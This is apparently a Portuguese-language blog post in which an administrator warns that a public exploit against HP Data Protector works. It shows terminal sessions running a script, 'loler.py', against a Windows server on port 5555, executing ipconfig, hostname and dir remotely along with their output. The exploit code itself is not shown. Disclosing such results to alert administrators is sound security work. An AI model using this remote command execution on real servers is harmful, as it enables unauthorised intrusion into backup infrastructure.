Fiz testes e uma falha de segurança do HP data protector com o exploit do link abaixo e o mesmo funcionou corretamente. Fica o alerta para os administradores, acredito que uma atualização resolva o problema, vou postar os resultados assim que nós atualizarmos o software.
Fiz os testes com um sistema linux, o servidor Data Protector está em um sistema windows.
Segue o exploit:
Testes:
[root@proxyteste ~]# python loler.py 10.1.1.1 5555 ipconfig
[*] Connecting to target '10.1.1.1:5555'...
[*] Connected to the target.
[*] Sending payload 'ipconfig'
[*] Output:
Windows IP Configuration
Ethernet adapter Local Area Connection 7:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.1.1.1
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.1.1.254
....
[root@proxyteste ~]# python loler.py 10.1.1.1 5555 hostname
[*] Connecting to target '10.1.1.1:5555'...
[*] Connected to the target.
[*] Sending payload 'hostname'
[*] Output:
DPSERVER
...
[root@proxyteste ~]# python loler.py 10.1.1.1 5555 'dir c:' | less
Volume in drive C has no label.
Volume Serial Number is 72AF-MD27
Directory of C:\Windows\System32
10/26/2012 07:36 AM <DIR> .
10/26/2012 07:36 AM <DIR> ..
01/19/2008 11:02 AM <DIR> 0409
09/18/2006 06:28 PM 2,151 12520437.cpx
09/18/2006 06:28 PM 2,233 12520850.cpx
09/18/2006 06:32 PM 1,228,100 8point1.wav
04/11/2009 01:12 PM 136,192 aaclient.dll
04/11/2009 01:11 PM 2,515,968 accessibilitycpl.dll
0 comentários:
Postar um comentário